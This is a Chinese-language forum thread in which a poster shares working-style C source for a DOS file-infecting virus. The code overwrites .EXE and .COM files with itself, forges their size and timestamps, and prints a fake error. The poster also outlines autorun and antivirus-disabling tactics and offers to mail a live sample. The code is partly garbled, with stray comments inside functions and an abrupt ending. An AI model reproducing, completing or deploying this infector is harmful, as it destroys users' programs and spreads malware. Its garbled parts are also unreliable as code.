同意
希望能够看到大家的大作
希望能够看到大家的大作
在下是搂主!
以前不是在开玩笑,希望大家多说代码,少说无用的话!谢谢各位!
/* the code came from Internet,
translated by me(fengyun5e1@163.com)
maybe there are some mistakes in it,
please correct it and do some good code on the
passage(I think it is much better to talk something unusually!)
Thank you very much!
*/
/* C病毒有很多种,这是一个嵌入式病毒的典型例子,其一般规律是:
一般有两个文件,一个是autorun.inf,另一个就是病毒程序了(用C编就可以了)
NO.1 复制自己,感染其他文件——见下面的code
NO.2 加载到启动组,这个VB最容易做到!
NO.3 网络等等
NO.4 还有,破坏之类... 当然最主要的还是先PK掉杀毒软件!——今天我就碰到一个病毒,还真厉害,他先修改我的系统时间,使kaba报告“注册时间有误”,失去作用,接着kaba 就came over!了(对了,还有我把这个病毒收藏起来了,他有两个文件autorun.inf和edveokw.exe,前一个文件大家都知道,就不说了,后一个谁想要我给你邮过去!我本打算找个反编译软件,可是没有啊!要是谁有,我们可以一起来整一整这个程序啊!呵呵,还是那句话,为了学习啊!)
(我就会这么多了,剩下的谁知道,就轮到您说吧!)
#include "stdio.h"
#include "string.h"
#include "dos.h"
#include "io.h"
#include "stdlib.h"
void hostile_activity(void); // a function which to destroy
int infected(char *); //check the file to see if it was injected
void spread(char *, char *); //do the function of spreading
void small_print(char *); //other functions
char *victim(void);
#define DEBUG
#define ONE_KAY 1024
#define TOO_SMALL ((6 * ONE_KAY) + 300) //define the smallest files
#define SIGNATURE "NMAN" // Sign of infection
int main(void)
{
/* The main program */
spread(_argv[0], victim()); // Perform infection
small_print("Out of memory\r\n"); // Print phony error
return(1); // Fake failure...
}
void hostile_activity(void)
{
/* Put whatever you feel like doing here...I chose to
make this part harmless, but if you're feeling
nasty, go ahead and have some fun... */
small_print("\a\a\aAll files infected. Mission complete.\r\n");
exit(2);
}
int infected(char *fname)
{
/* This function determines if fname is infected */
FILE *fp; // File handle
char sig[5]; // Virus signature
fp = fopen(fname, "rb");
fseek(fp, 28L, SEEK_SET);
fread(sig, sizeof(sig) - 1, 1, fp);
#ifdef DEBUG
printf("Signature for %s: %s\n", fname, sig);
#endif
fclose(fp);
return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);
}
void small_print(char *string) I don't know This function !
{/* This function is a small, quick print routine */ I think ....
asm {
push si
mov si,string
mov ah,0xE
}
print: asm {
lodsb
or al,al
je finish
int 0x10
jmp short print
}
finish: asm pop si
}
void spread(char *old_name, char *new_name)
{/* This function infects new_name with old_name */
/* Variable declarations */
FILE *old, *new; // File handles
struct ftime file_time; // Old file date,
time
int attrib; // Old attributes
long old_size, virus_size; // Sizes of files
char *virus_code = NULL; // Pointer to virus
int old_handle, new_handle; // Handles for files
/* Perform the infection */
#ifdef DEBUG
printf("Infecting %s with %s...\n", new_name, old_name);
#endif
old = fopen(old_name, "rb"); // Open virus
new = fopen(new_name, "rb"); // Open victim
old_handle = fileno(old); // Get file handles
new_handle = fileno(new);
old_size = filelength(new_handle); // Get old file size
virus_size = filelength(old_handle); // Get virus size
attrib = _chmod(new_name, 0); // Get old attributes
getftime(new_handle, &file_time); // Get old file time
fclose(new); // Close the virusee
_chmod(new_name, 1, 0); // Clear any read-only
unlink(new_name); // Erase old file
new = fopen(new_name, "wb"); // Open new virus
new_handle = fileno(new);
virus_code = malloc(virus_size); // Allocate space
fread(virus_code, virus_size, 1, old); // Read virus from old
fwrite(virus_code, virus_size, 1, new); // Copy virus to new
_chmod(new_name, 1, attrib); // Replace attributes
chsize(new_handle, old_size); // Replace old size
setftime(new_handle, &file_time); // Replace old time
/* Clean up */
fcloseall(); // Close files
free(virus_code); // Free memory
}
char *victim(void)
{
/* This function returns the virus's next victim */
/* Variable declarations */
char *types[] = {"*.EXE", "*.COM"}; // Potential victims
static struct ffblk ffblk; // DOS file block
int done; // Indicates finish
int index; // Used for loop
/* Find our victim */
if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))
return(_argv[1]);
for (index = 0; index < sizeof(types); index++) {
done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
FA_SYSTEM | FA_ARCH);
while (!done) {
#ifdef DEBUG
printf("Scanning %s...\n", ffblk.ff_name);
#endif
/* If you want to check for specific days of the week,
months, etc., here is the place to insert the
code (don't forget to "#include "!) */
if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
TOO_SMALL))
return(ffblk.ff_name);
done = findnext(&ffblk);
}
}
/* If there are no files left to infect, have a little fun... */
hostile_activity();
return(0); // Prevents warning
我是黔驴技穷了,看各位的了!
